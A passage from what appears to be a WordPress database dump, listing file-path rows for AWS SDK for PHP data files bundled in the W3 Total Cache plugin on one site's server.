ontent/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/quicksight/2018-04-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/quicksight/2018-04-01/api-2.json.php'),(6150,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/quicksight/2018-04-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/quicksight/2018-04-01/paginators-1.json.php'),(6151,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ram/2018-01-04/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ram/2018-01-04/api-2.json.php'),(6152,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ram/2018-01-04/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ram/2018-01-04/paginators-1.json.php'),(6153,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-09-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-09-01/api-2.json.php'),(6154,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-09-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-09-01/paginators-1.json.php'),(6155,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-09-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-09-01/smoke.json.php'),(6156,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/api-2.json.php'),(6157,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/paginators-1.json.php'),(6158,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/smoke.json.php'),(6159,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/waiters-1.json.php'),(6160,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/waiters-2.json.php'),(6161,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds-data/2018-08-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds-data/2018-08-01/api-2.json.php'),(6162,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds-data/2018-08-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds-data/2018-08-01/paginators-1.json.php'),(6163,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/api-2.json.php'),(6164,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/paginators-1.json.php'),(6165,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/smoke.json.php'),(6166,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/waiters-1.json.php'),(6167,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/waiters-2.json.php'),(6168,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift-data/2019-12-20/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift-data/2019-12-20/api-2.json.php'),(6169,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift-data/2019-12-20/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift-data/2019-12-20/paginators-1.json.php'),(6170,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rekognition/2016-06-27/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rekognition/2016-06-27/api-2.json.php'),(6171,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rekognition/2016-06-27/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rekognition/2016-06-27/paginators-1.json.php'),(6172,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rekognition/2016-06-27/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rekognition/2016-06-27/smoke.json.php'),(6173,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rekognition/2016-06-27/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rekognition/2016-06-27/waiters-2.json.php'),(6174,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/resource-groups/2017-11-27/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/resource-groups/2017-11-27/api-2.json.php'),(6175,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/resource-groups/2017-11-27/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/resource-groups/2017-11-27/paginators-1.json.php'),(6176,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/resourcegroupstaggingapi/2017-01-26/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/resourcegroupstaggingapi/2017-01-26/api-2.json.php'),(6177,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/resourcegroupstaggingapi/2017-01-26/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/resourcegroupstaggingapi/2017-01-26/paginators-1.json.php'),(6178,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/robomaker/2018-06-29/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/robomaker/2018-06-29/api-2.json.php'),(6179,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/robomaker/2018-06-29/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/robomaker/2018-06-29/paginators-1.json.php'),(6180,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/api-2.json.php'),(6181,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/paginators-1.json.php'),(6182,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/smoke.json.php'),(6183,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/waiters-2.json.php'),(6184,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53domains/2014-05-15/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53domains/2014-05-15/api-2.json.php'),(6185,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53domains/2014-05-15/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53domains/2014-05-15/paginators-1.json.php'),(6186,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53domains/2014-05-15/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53domains/2014-05-15/smoke.json.php'),(6187,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53resolver/2018-04-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53resolver/2018-04-01/api-2.json.php'),(6188,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53resolver/2018-04-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53resolver/2018-04-01/paginators-1.json.php'),(6189,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53resolver/2018-04-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53resolver/2018-04-01/smoke.json.php'),(6190,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.lex/2016-11-28/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.lex/2016-11-28/api-2.json.php'),(6191,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.lex/2016-11-28/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.lex/2016-11-28/paginators-1.json.php'),(6192,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.lex.v2/2020-08-07/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.lex.v2/2020-08-07/api-2.json.php'),(6193,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.lex.v2/2020-08-07/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.lex.v2/2020-08-07/paginators-1.json.php'),(6194,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.sagemaker/2017-05-13/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.sagemaker/2017-05-13/api-2.json.php'),(6195,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.sagemaker/2017-05-13/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.sagemaker/2017-05-13/paginators-1.json.php'),(6196,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/api-2.json.php'),(6197,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/paginators-1.json.php'),(6198,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/smoke.json.php'),(6199,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/waiters-1.json.php'),(6200,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/waiters-2.json.php'),(6201,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3control/2018-08-20/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3control/2018-08-20/api-2.json.php'),(6202,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3control/2018-08-20/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3control/2018-08-20/paginators-1.json.php'),(6203,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3outposts/2017-07-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3outposts/2017-07-25/api-2.json.php'),(6204,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3outposts/2017-07-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3outposts/2017-07-25/paginators-1.json.php'),(6205,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker/2017-07-24/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker/2017-07-24/api-2.json.php'),(6206,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker/2017-07-24/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker/2017-07-24/paginators-1.json.php'),(6207,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker/2017-07-24/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker/2017-07-24/waiters-2.json.php'),(6208,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-a2i-runtime/2019-11-07/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-a2i-runtime/2019-11-07/api-2.json.php'),(6209,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-a2i-runtime/2019-11-07/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-a2i-runtime/2019-11-07/paginators-1.json.php'),(6210,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-edge/2020-09-23/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-edge/2020-09-23/api-2.json.php'),(6211,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-edge/2020-09-23/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-edge/2020-09-23/paginators-1.json.php'),(6212,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-featurestore-runtime/2020-07-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-featurestore-runtime/2020-07-01/api-2.json.php'),(6213,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-featurestore-runtime/2020-07-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-featurestore-runtime/2020-07-01/paginators-1.json.php'),(6214,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/savingsplans/2019-06-28/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/savingsplans/2019-06-28/api-2.json.php'),(6215,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/savingsplans/2019-06-28/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/savingsplans/2019-06-28/paginators-1.json.php'),(6216,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/schemas/2019-12-02/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/schemas/2019-12-02/api-2.json.php'),(6217,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/schemas/2019-12-02/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/schemas/2019-12-02/paginators-1.json.php'),(6218,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/schemas/2019-12-02/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/schemas/2019-12-02/waiters-2.json.php'),(6219,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/secretsmanager/2017-10-17/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/secretsmanager/2017-10-17/api-2.json.php'),(6220,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/secretsmanager/2017-10-17/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/secretsmanager/2017-10-17/paginators-1.json.php'),(6221,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/secretsmanager/2017-10-17/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/secretsmanager/2017-10-17/smoke.json.php'),(6222,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/securityhub/2018-10-26/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/securityhub/2018-10-26/api-2.json.php'),(6223,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/securityhub/2018-10-26/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/securityhub/2018-10-26/paginators-1.json.php'),(6224,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/serverlessrepo/2017-09-08/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/serverlessrepo/2017-09-08/api-2.json.php'),(6225,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/serverlessrepo/2017-09-08/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/serverlessrepo/2017-09-08/paginators-1.json.php'),(6226,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/service-quotas/2019-06-24/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/service-quotas/2019-06-24/api-2.json.php'),(6227,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/service-quotas/2019-06-24/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/service-quotas/2019-06-24/paginators-1.json.php'),(6228,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog/2015-12-10/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog/2015-12-10/api-2.json.php'),(6229,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog/2015-12-10/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog/2015-12-10/paginators-1.json.php'),(6230,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog/2015-12-10/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog/2015-12-10/smoke.json.php'),(6231,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog-appregistry/2020-06-24/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog-appregistry/2020-06-24/api-2.json.php'),(6232,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog-appregistry/2020-06-24/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog-appregistry/2020-06-24/paginators-1.json.php'),(6233,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicediscovery/2017-03-14/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicediscovery/2017-03-14/api-2.json.php'),(6234,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicediscovery/2017-03-14/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicediscovery/2017-03-14/paginators-1.json.php'),(6235,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sesv2/2019-09-27/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sesv2/2019-09-27/api-2.json.php'),(6236,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sesv2/2019-09-27/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sesv2/2019-09-27/paginators-1.json.php'),(6237,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/shield/2016-06-02/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/shield/2016-06-02/api-2.json.php'),(6238,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/shield/2016-06-02/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/shield/2016-06-02/paginators-1.json.php'),(6239,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/shield/2016-06-02/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/shield/2016-06-02/smoke.json.php'),(6240,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/signer/2017-08-25/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/signer/2017-08-25/api-2.json.php'),(6241,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/signer/2017-08-25/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/signer/2017-08-25/paginators-1.json.php'),(6242,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/signer/2017-08-25/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/signer/2017-08-25/waiters-2.json.php'),(6243,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms/2016-10-24/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms/2016-10-24/api-2.json.php'),(6244,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms/2016-10-24/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms/2016-10-24/paginators-1.json.php'),(6245,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms/2016-10-24/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms/2016-10-24/smoke.json.php'),(6246,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms-voice/2018-09-05/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms-voice/2018-09-05/api-2.json.php'),(6247,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/snowball/2016-06-30/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/snowball/2016-06-30/api-2.json.php'),(6248,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/snowball/2016-06-30/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/snowball/2016-06-30/paginators-1.json.php'),(6249,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/snowball/2016-06-30/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/snowball/2016-06-30/smoke.json.php'),(6250,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sns/2010-03-31/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sns/2010-03-31/api-2.json.php'),(6251,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sns/2010-03-31/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sns/2010-03-31/paginators-1.json.php'),(6252,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sns/2010-03-31/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sns/2010-03-31/smoke.json.php'),(6253,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sqs/2012-11-05/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sqs/2012-11-05/api-2.json.php'),(6254,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sqs/2012-11-05/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/a